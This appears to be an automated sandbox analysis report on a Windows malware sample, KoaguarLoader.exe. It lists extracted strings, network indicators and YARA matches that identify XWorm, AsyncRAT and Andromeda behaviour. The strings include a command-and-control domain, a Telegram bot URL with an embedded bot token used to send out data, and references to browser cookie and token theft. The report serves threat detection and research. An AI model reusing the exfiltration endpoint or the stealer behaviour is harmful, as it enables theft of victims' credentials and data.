                        Source: KoaguarLoader.exe, 00000002.00000002.945609368.0000000002414000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://1.1.1.1/dns-query?name=sa1at.ru7fd4917665566bc1c40a05008f60e4f674
                        Source: powershell.exe, 00000005.00000002.1005496636.000002B0BAE31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1087717614.000002225ADB1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1218712283.0000028E45FA1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                        Source: svhost.exe, 00000003.00000002.2138122248.000000000320E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegrP
                        Source: svhost.exe, 00000003.00000002.2138122248.000000000320E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
                        Source: svhost.exe, 00000003.00000002.2138122248.00000000031DD000.00000004.00000800.00020000.00000000.sdmp, svhost.exe, 00000003.00000000.877223219.0000000000F02000.00000002.00000001.01000000.00000006.sdmpString found in binary or memory: https://api.telegram.org/bot
                        Source: svhost.exe, 00000003.00000002.2138122248.000000000320E000.00000004.00000800.00020000.00000000.sdmp, svhost.exe, 00000003.00000002.2138122248.0000000003200000.00000004.00000800.00020000.00000000.sdmp, svhost.exe, 00000003.00000002.2138122248.000000000320C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot7633754203:AAGdgIxVhns7RJswrsnNS4ilwSCe6ayObHQ/sendMessage?chat_id=10998
                        Source: powershell.exe, 0000000D.00000002.1337892983.0000028E56013000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                        Source: powershell.exe, 0000000D.00000002.1337892983.0000028E56013000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                        Source: powershell.exe, 0000000D.00000002.1337892983.0000028E56013000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                        Source: svchost.exe, 0000000F.00000003.1211505121.000001CB6D5E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/odclientsettings/Prod/C:
                        Source: svchost.exe, 0000000F.00000003.1211505121.000001CB6D570000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://g.live.com/odclientsettings/ProdV2/C:
                        Source: powershell.exe, 0000000D.00000002.1218712283.0000028E461C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                        Source: powershell.exe, 00000005.00000002.1032821832.000002B0CAEA3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1159859244.000002226AE23000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.1337892983.0000028E56013000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                        Source: I1y524I4zau1n3u.exe, 00000004.00000002.949808464.0000000001D30000.00000004.00001000.00020000.00000000.sdmp, HkqNfKUrMBAD.exe, 00000009.00000002.1088348281.00000000018F0000.00000004.00001000.00020000.00000000.sdmp, HkqNfKUrMBAD.exe, 00000010.00000002.1219532412.0000000001EE2000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://ocsp.quovadisoffshore.com
                        Source: KoaguarLoader.exe, 00000002.00000002.945609368.0000000002574000.00000004.00001000.00020000.00000000.sdmp, I1y524I4zau1n3u.exe, 00000004.00000002.949808464.0000000001D30000.00000004.00001000.00020000.00000000.sdmp, HkqNfKUrMBAD.exe, 00000009.00000002.1088348281.00000000018F0000.00000004.00001000.00020000.00000000.sdmp, I1y524I4zau1n3u.exe, 0000000C.00000002.2135765900.0000000001DB6000.00000004.00001000.00020000.00000000.sdmp, HkqNfKUrMBAD.exe, 00000010.00000002.1219532412.0000000001EE2000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://ocsp.quovadisoffshore.com0
                        Source: KoaguarLoader.exe, 00000002.00000002.945609368.000000000275E000.00000004.00001000.00020000.00000000.sdmp, I1y524I4zau1n3u.exe, 00000004.00000002.949808464.0000000001D50000.00000004.00001000.00020000.00000000.sdmp, HkqNfKUrMBAD.exe, 00000009.00000002.1090236510.0000000001B5C000.00000004.00001000.00020000.00000000.sdmp, I1y524I4zau1n3u.exe, 0000000C.00000002.2135765900.0000000001DB6000.00000004.00001000.00020000.00000000.sdmp, HkqNfKUrMBAD.exe, 00000010.00000002.1219532412.0000000001EFE000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://repository.luxtrust.lu0
                        Source: KoaguarLoader.exe, 00000002.00000002.945609368.0000000002414000.00000004.00001000.00020000.00000000.sdmp, KoaguarLoader.exe, 00000002.00000002.945609368.00000000024A2000.00000004.00001000.00020000.00000000.sdmp, HkqNfKUrMBAD.exe, 00000009.00000002.1088348281.000000000188E000.00000004.00001000.00020000.00000000.sdmp, I1y524I4zau1n3u.exe, 0000000C.00000002.2135765900.00000000049C0000.00000004.00001000.00020000.00000000.sdmp, I1y524I4zau1n3u.exe, 0000000C.00000002.2135765900.0000000001D0C000.00000004.00001000.00020000.00000000.sdmp, I1y524I4zau1n3u.exe, 0000000C.00000002.2135765900.00000000029A8000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://sa1at.ru/sa1at/
                        Source: KoaguarLoader.exe, 00000002.00000002.945609368.0000000002414000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://sa1at.ru/sa1at/RepetitionDurationIntervalEndBoundaryRepetitionDurationInterval2025-03-11T12:
                        Source: I1y524I4zau1n3u.exe, 0000000C.00000002.2135765900.0000000001D0C000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://sa1at.ru/sa1at/etext/html;
                        Source: KoaguarLoader.exe, 00000002.00000002.945609368.00000000024A2000.00000004.00001000.00020000.00000000.sdmp, HkqNfKUrMBAD.exe, 00000009.00000002.1088348281.000000000188E000.00000004.00001000.00020000.00000000.sdmp, I1y524I4zau1n3u.exe, 0000000C.00000002.2135765900.00000000049C0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://sa1at.ru/sa1at/https://sa1at.ru/sa1at/
                        Source: I1y524I4zau1n3u.exe, 0000000C.00000002.2135765900.00000000029A8000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://sa1at.ru/sa1at/https://sa1at.ru/sa1at/https://sa1at.ru/sa1at/https://sa1at.ru/sa1at/
                        Source: I1y524I4zau1n3u.exe, 0000000C.00000002.2135765900.0000000001D0C000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://sa1at.ru/sa1at/https://sa1at.ru/sa1at/https://sa1at.ru/sa1at/https://sa1at.ru/sa1at/etext/ht
                        Source: I1y524I4zau1n3u.exe, 0000000C.00000002.2135765900.0000000001D0C000.00000004.00001000.00020000.00000000.sdmp, I1y524I4zau1n3u.exe, 0000000C.00000002.2135765900.00000000029A8000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://sa1at.ru/sa1at/https://sa1at.ru/sa1at/https://sa1at.ru/sa1at/https://sa1at.ru/sa1at/https://
                        Source: I1y524I4zau1n3u.exe, 0000000C.00000002.2135765900.0000000001D0C000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://sa1at.ru/sa1at/https://sa1at.ru/sa1at/https://sa1at.ru/sa1at/https://sa1at.ru/sa1at/text/htm
                        Source: I1y524I4zau1n3u.exe, 0000000C.00000002.2135765900.00000000029A8000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://sa1at.ru/sa1at/https://sa1at.ru/sa1at/text/html;
                        Source: unknown Network traffic detected: HTTP traffic on port 49702 -> 443
                        Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49702
                        Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.8:49702 version: TLS 1.2
                        Source: KoaguarLoader.exe, 00000002.00000002.939032080.0000000000E81000.00000040.00000001.01000000.00000005.sdmp Binary or memory string: stopm spinning nmidlelocked= needspinning=randinit twicestore64 failedmemprofileratesemaRoot queuebad allocCountbad span statestack overflow untyped args out of range no module dataruntime: seq1=runtime: goid= in goroutine unsafe.Pointerreflect.Value.RCodeNameErrorResourceHeaderunreachable: Accept-CharsetDkim-Signatureneed more dataREQUEST_METHODInstEmptyWidthmax-age=604800NO_VIABLE_PATHpacing limitedsqlite3_errstrsqlite3_errmsggo_commit_hookgo_update_hookgo_vtab_creatego_vtab_updatego_vtab_renamego_vtab_commitunixepoch_fracunixepoch_nano15:04:05Z07:00mime/multipartmutable-globalgo_sector_sizego_shm_barrierf32.demote_f64i32.extend16_si64.extend16_si64.extend32_sv128.load8x8_sv128.load8x8_uv128.bitselecti8x16.all_truei16x8.all_truei32x4.all_truei64x2.all_trueread block: %wfunc[%s.%s] %winvalid %s: %wunknown memoryalready closedI32WrapFromI64read value: %vsection %s: %vglobal[%d]: %wProcess32FirstWDispatchMessageSetWinEventHookHarmonyOutdatedchunk confirmedunzipping file winsta0\defaultgot dExec code:found tg:// urlActive window: Build Version: Browsers\Token_Network\Cookieszipinsecurepathrecord overflowbad certificatePKCS1WithSHA256PKCS1WithSHA384PKCS1WithSHA512ClientAuthType(client finishedserver finishedunknown versionmissing address/etc/mdns.allowunknown networknegative updateaccept-encodingaccept-languagex-forwarded-forAccept-Encodingrecv_rststream_Idempotency-KeyPartial ContentRequest TimeoutLength RequiredNot ImplementedGateway Timeoutunexpected typebad trailer keywrite error: %wGetProcessTimesDuplicateHandlenegative offsetGetMonitorInfoW476837158203125advertise errorkey has expirednetwork is downno medium foundno such processGetAdaptersInfoCreateHardLinkWDeviceIoControlFlushViewOfFileGetCommandLineWGetStartupInfoWUnmapViewOfFileFailed to load Failed to find : cannot parse ,M3.2.0,M11.1.0general failuredata before FINbad close code ExcludeClipRectGetEnhMetaFileWGetTextMetricsWPlayEnhMetaFileGdiplusShutdownGetThreadLocaleOleUninitializewglGetCurrentDCDragAcceptFilesCallWindowProcWCreatePopupMenuCreateWindowExWDialogBoxParamWGetActiveWindowGetDpiForWindowGetRawInputDataInsertMenuItemWIsWindowEnabledIsWindowVisiblePostQuitMessageSetActiveWindowTrackMouseEventWindowFromPointDrawThemeTextExGetSecurityInfoImpersonateSelfOpenThreadTokenSetSecurityInfoAddDllDirectoryFindNextVolumeWFindVolumeCloseGetCommTimeoutsIsWow64Process2QueryDosDeviceWSetCommTimeoutsSetVolumeLabelWRtlDefaultNpAclCLSIDFromStringStringFromGUID2IsWindowUnicodetimeBeginPeriodNTSTATUS 0x%08xRegCreateKeyExWRegDeleteValueWx509usepoliciesNetworkSettingsRestartIntervalEvery other dayConsole Connectnothing to packIgnoring Retry.invalid boolean0601021504Z0700non-minimal tagunknown Go typeHanifi_RohingyaPsalter_Pahlavireflectlite.Set is unavailableallocmRInternalwrite heap dumpasyncpreemptoffforce gc (idle)sync.Mutex.Lockmalloc deadlockruntime error: elem size wrong with GC progmemstr_d0a56185-1

                        Operating System Destruction

                        Source: C:\Users\user\AppData\Local\Temp\svhost.exe Process information set: 01 00 00 00

                        System Summary

                        Source: KoaguarLoader.exe, type: SAMPLE Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
                        Source: KoaguarLoader.exe, type: SAMPLE Matched rule: Detects AsyncRAT Author: ditekSHen
                        Source: 3.2.svhost.exe.31e05f0.0.unpack, type: UNPACKEDPE Matched rule: Detects a malicious Worm Andromeda / RETADUP Author: Florian Roth
                        Source: 3.2.svhost.exe.31e05f0.0.unpack, type: UNPACKEDPE Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
                        Source: 3.2.svhost.exe.31e05f0.0.unpack, type: UNPACKEDPE Matched rule: Detects AsyncRAT Author: ditekSHen
                        Source: 0.3.KoaguarLoader.exe.a5f010.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects a malicious Worm Andromeda / RETADUP Author: Florian Roth
                        Source: 0.3.KoaguarLoader.exe.a5f010.0.raw.unpack, type: UNPACKEDPE Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
                        Source: 0.3.KoaguarLoader.exe.a5f010.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects AsyncRAT Author: ditekSHen
                        Source: 3.2.svhost.exe.31e05f0.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects a malicious Worm Andromeda / RETADUP Author: Florian Roth
                        Source: 0.0.KoaguarLoader.exe.727e94.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects a malicious Worm Andromeda / RETADUP Author: Florian Roth
                        Source: 3.2.svhost.exe.31e05f0.0.raw.unpack, type: UNPACKEDPE Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
                        Source: 0.0.KoaguarLoader.exe.727e94.2.raw.unpack, type: UNPACKEDPE Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
                        Source: 3.2.svhost.exe.31e05f0.0.raw.unpack, type: UNPACKEDPE Matched rule: Detects AsyncRAT Author: ditekSHen
                        Source: 0.0.KoaguarLoader.exe.727e94.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects AsyncRAT Author: ditekSHen
                        Source: 0.0.KoaguarLoader.exe.727e94.2.unpack, type: UNPACKEDPE Matched rule: Detects a malicious Worm Andromeda / RETADUP Author: Florian Roth
                        Source: 0.0.KoaguarLoader.exe.727e94.2.unpack, type: UNPACKEDPE Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
                        Source: 0.0.KoaguarLoader.exe.727e94.2.unpack, type: UNPACKEDPE Matched rule: Detects AsyncRAT Author: ditekSHen
                        Source: 3.0.svhost.exe.f00000.0.unpack, type: UNPACKEDPE Matched rule: Detects a malicious Worm Andromeda / RETADUP Author: Florian Roth
                        Source: 3.0.svhost.exe.f00000.0.unpack, type: UNPACKEDPE Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
                        Source: 3.0.svhost.exe.f00000.0.unpack, type: UNPACKEDPE Matched rule: Detects AsyncRAT Author: ditekSHen
                        Source: 0.3.KoaguarLoader.exe.a5f010.0.unpack, type: UNPACKEDPE Matched rule: Detects a malicious Worm Andromeda / RETADUP Author: Florian Roth
                        Source: 0.3.KoaguarLoader.exe.a5f010.0.unpack, type: UNPACKEDPE Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
                        Source: 0.3.KoaguarLoader.exe.a5f010.0.unpack, type: UNPACKEDPE Matched rule: Detects AsyncRAT Author: ditekSHen
                        Source: 0.0.KoaguarLoader.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
                        Source: 0.0.KoaguarLoader.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects AsyncRAT Author: ditekSHen
                        Source: 0.0.KoaguarLoader.exe.409294.1.raw.unpack, type: UNPACKEDPE Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
                        Source: 0.0.KoaguarLoader.exe.409294.1.raw.unpack, type: UNPACKEDPE Matched rule: Detects AsyncRAT Author: ditekSHen
                        Source: 0.0.KoaguarLoader.exe.409294.1.unpack, type: UNPACKEDPE Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
                        Source: 0.0.KoaguarLoader.exe.409294.1.unpack, type: UNPACKEDPE Matched rule: Detects AsyncRAT Author: ditekSHen
                        Source: 00000000.00000003.877294126.0000000000A50000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects AsyncRAT Author: ditekSHen
                        Source: 00000000.00000000.868675253.0000000000408000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY Matched rule: Detects AsyncRAT Author: ditekSHen
                        Source: 00000003.00000002.2138122248.00000000031DD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Detects AsyncRAT Author: ditekSHen
                        Source: 00000003.00000000.877223219.0000000000F02000.00000002.00000001.01000000.00000006.sdmp, type: MEMORY Matched rule: Detects AsyncRAT Author: ditekSHen
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exe, type: DROPPED Matched rule: Detects a malicious Worm Andromeda / RETADUP Author: Florian Roth
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exe, type: DROPPED Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exe, type: DROPPED Matched rule: Detects AsyncRAT Author: ditekSHen
                        Source: C:\Users\user\AppData\Roaming\svhost.exe, type: DROPPED Matched rule: Detects a malicious Worm Andromeda / RETADUP Author: Florian Roth
                        Source: C:\Users\user\AppData\Roaming\svhost.exe, type: DROPPED Matched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
                        Source: C:\Users\user\AppData\Roaming\svhost.exe, type: DROPPED Matched rule: Detects AsyncRAT Author: ditekSHen
                        Source: C:\Windows\System32\svchost.exe File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exe Code function: 3_2_00007FF936A916F9
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exe Code function: 3_2_00007FF936A96C62
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exe Code function: 3_2_00007FF936A92181
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exe Code function: 3_2_00007FF936A95EB6
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exe Code function: 3_2_00007FF936A91EFD
                        Source: C:\Users\user\AppData\Local\Temp\svhost.exe Code function: 3_2_00007FF936A9265E
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_00007FF936AB00AD
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_00007FF936AB10FA
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_00007FF936B830E9
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 10_2_00007FF936AB00AD
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 10_2_00007FF936B82E11
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 13_2_00007FF936AB00AD
                        Source: C:\Users\user\AppData\Roaming\svhost.exe Code function: 26_2_00007FF936A916F9
                        Source: C:\Users\user\AppData\Roaming\svhost.exe Code function: 26_2_00007FF936A91EFD
                        Source: C:\Users\user\AppData\Roaming\svhost.exe Code function: 26_2_00007FF936A900AD
                        Source: KoaguarLoader.exe Static PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
                        Source: KoaguarLoader.exe Static PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                        Source: KoaguarLoader.exe, 00000000.00000003.877294126.0000000000A50000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilename svhost.exe4 vs KoaguarLoader.exe
                        Source: KoaguarLoader.exe Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                        Source: KoaguarLoader.exe, type: SAMPLE Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
                        Source: KoaguarLoader.exe, type: SAMPLE Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                        Source: 3.2.svhost.exe.31e05f0.0.unpack, type: UNPACKEDPE Matched rule: Andromeda_MalBot_Jun_1A date = 2017-06-30, hash4 = 42a02e6cf7c424c12f078fca21805de072842ec52a25ea87bd7d53e7feb536ed, hash3 = 66035cc81e811735beab573013950153749b02703eae58b90430646f6e3e3eb4, hash2 = 73cecc67bb12cf5a837af9fba15b7792a6f1a746b246b34f8ed251c4372f1a98, hash1 = 3c223bbf83ac2f91c79383a53ed15b0c8ffe2caa1bf52b26c17fd72278dc7ef9, author = Florian Roth, description = Detects a malicious Worm Andromeda / RETADUP, reference = http://blog.trendmicro.com/trendlabs-security-intelligence/information-stealer-found-hitting-israeli-hospitals/, license = https://creativecommons.org/licenses/by-nc/4.0/
                        Source: 3.2.svhost.exe.31e05f0.0.unpack, type: UNPACKEDPE Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
                        Source: 3.2.svhost.exe.31e05f0.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                        Source: 0.3.KoaguarLoader.exe.a5f010.0.raw.unpack, type: UNPACKEDPE Matched rule: Andromeda_MalBot_Jun_1A date = 2017-06-30, hash4 = 42a02e6cf7c424c12f078fca21805de072842ec52a25ea87bd7d53e7feb536ed, hash3 = 66035cc81e811735beab573013950153749b02703eae58b90430646f6e3e3eb4, hash2 = 73cecc67bb12cf5a837af9fba15b7792a6f1a746b246b34f8ed251c4372f1a98, hash1 = 3c223bbf83ac2f91c79383a53ed15b0c8ffe2caa1bf52b26c17fd72278dc7ef9, author = Florian Roth, description = Detects a malicious Worm Andromeda / RETADUP, reference = http://blog.trendmicro.com/trendlabs-security-intelligence/information-stealer-found-hitting-israeli-hospitals/, license = https://creativecommons.org/licenses/by-nc/4.0/
                        Source: 0.3.KoaguarLoader.exe.a5f010.0.raw.unpack, type: UNPACKEDPE Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
                        Source: 0.3.KoaguarLoader.exe.a5f010.0.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                        Source: 3.2.svhost.exe.31e05f0.0.raw.unpack, type: UNPACKEDPE Matched rule: Andromeda_MalBot_Jun_1A date = 2017-06-30, hash4 = 42a02e6cf7c424c12f078fca21805de072842ec52a25ea87bd7d53e7feb536ed, hash3 = 66035cc81e811735beab573013950153749b02703eae58b90430646f6e3e3eb4, hash2 = 73cecc67bb12cf5a837af9fba15b7792a6f1a746b246b34f8ed251c4372f1a98, hash1 = 3c223bbf83ac2f91c79383a53ed15b0c8ffe2caa1bf52b26c17fd72278dc7ef9, author = Florian Roth, description = Detects a malicious Worm Andromeda / RETADUP, reference = http://blog.trendmicro.com/trendlabs-security-intelligence/information-stealer-found-hitting-israeli-hospitals/, license = https://creativecommons.org/licenses/by-nc/4.0/
                        Source: 0.0.KoaguarLoader.exe.727e94.2.raw.unpack, type: UNPACKEDPE Matched rule: Andromeda_MalBot_Jun_1A date = 2017-06-30, hash4 = 42a02e6cf7c424c12f078fca21805de072842ec52a25ea87bd7d53e7feb536ed, hash3 = 66035cc81e811735beab573013950153749b02703eae58b90430646f6e3e3eb4, hash2 = 73cecc67bb12cf5a837af9fba15b7792a6f1a746b246b34f8ed251c4372f1a98, hash1 = 3c223bbf83ac2f91c79383a53ed15b0c8ffe2caa1bf52b26c17fd72278dc7ef9, author = Florian Roth, description = Detects a malicious Worm Andromeda / RETADUP, reference = http://blog.trendmicro.com/trendlabs-security-intelligence/information-stealer-found-hitting-israeli-hospitals/, license = https://creativecommons.org/licenses/by-nc/4.0/
                        Source: 3.2.svhost.exe.31e05f0.0.raw.unpack, type: UNPACKEDPE Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
                        Source: 0.0.KoaguarLoader.exe.727e94.2.raw.unpack, type: UNPACKEDPE Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
                        Source: 3.2.svhost.exe.31e05f0.0.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                        Source: 0.0.KoaguarLoader.exe.727e94.2.raw.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                        Source: 0.0.KoaguarLoader.exe.727e94.2.unpack, type: UNPACKEDPE Matched rule: Andromeda_MalBot_Jun_1A date = 2017-06-30, hash4 = 42a02e6cf7c424c12f078fca21805de072842ec52a25ea87bd7d53e7feb536ed, hash3 = 66035cc81e811735beab573013950153749b02703eae58b90430646f6e3e3eb4, hash2 = 73cecc67bb12cf5a837af9fba15b7792a6f1a746b246b34f8ed251c4372f1a98, hash1 = 3c223bbf83ac2f91c79383a53ed15b0c8ffe2caa1bf52b26c17fd72278dc7ef9, author = Florian Roth, description = Detects a malicious Worm Andromeda / RETADUP, reference = http://blog.trendmicro.com/trendlabs-security-intelligence/information-stealer-found-hitting-israeli-hospitals/, license = https://creativecommons.org/licenses/by-nc/4.0/
                        Source: 0.0.KoaguarLoader.exe.727e94.2.unpack, type: UNPACKEDPE Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
                        Source: 0.0.KoaguarLoader.exe.727e94.2.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                        Source: 3.0.svhost.exe.f00000.0.unpack, type: UNPACKEDPE Matched rule: Andromeda_MalBot_Jun_1A date = 2017-06-30, hash4 = 42a02e6cf7c424c12f078fca21805de072842ec52a25ea87bd7d53e7feb536ed, hash3 = 66035cc81e811735beab573013950153749b02703eae58b90430646f6e3e3eb4, hash2 = 73cecc67bb12cf5a837af9fba15b7792a6f1a746b246b34f8ed251c4372f1a98, hash1 = 3c223bbf83ac2f91c79383a53ed15b0c8ffe2caa1bf52b26c17fd72278dc7ef9, author = Florian Roth, description = Detects a malicious Worm Andromeda / RETADUP, reference = http://blog.trendmicro.com/trendlabs-security-intelligence/information-stealer-found-hitting-israeli-hospitals/, license = https://creativecommons.org/licenses/by-nc/4.0/
                        Source: 3.0.svhost.exe.f00000.0.unpack, type: UNPACKEDPE Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
                        Source: 3.0.svhost.exe.f00000.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                        Source: 0.3.KoaguarLoader.exe.a5f010.0.unpack, type: UNPACKEDPE Matched rule: Andromeda_MalBot_Jun_1A date = 2017-06-30, hash4 = 42a02e6cf7c424c12f078fca21805de072842ec52a25ea87bd7d53e7feb536ed, hash3 = 66035cc81e811735beab573013950153749b02703eae58b90430646f6e3e3eb4, hash2 = 73cecc67bb12cf5a837af9fba15b7792a6f1a746b246b34f8ed251c4372f1a98, hash1 = 3c223bbf83ac2f91c79383a53ed15b0c8ffe2caa1bf52b26c17fd72278dc7ef9, author = Florian Roth, description = Detects a malicious Worm Andromeda / RETADUP, reference = http://blog.trendmicro.com/trendlabs-security-intelligence/information-stealer-found-hitting-israeli-hospitals/, license = https://creativecommons.org/licenses/by-nc/4.0/
                        Source: 0.3.KoaguarLoader.exe.a5f010.0.unpack, type: UNPACKEDPE Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
                        Source: 0.3.KoaguarLoader.exe.a5f010.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
                        Source: 0.0.KoaguarLoader.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: rat_win_xworm_v3 author = Sekoia.io, description = Finds XWorm (version XClient, v3) samples based on characteristic strings, creation_date = 2023-03-03, classification = TLP:CLEAR, version = 1.0, id = 5fb1cbd3-1e37-43b9-9606-86d896f2150b, hash = de0127ba872c0677c3594c66b2298edea58d097b5fa697302a16b1689147b147
                        Source: 0.0.KoaguarLoader.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
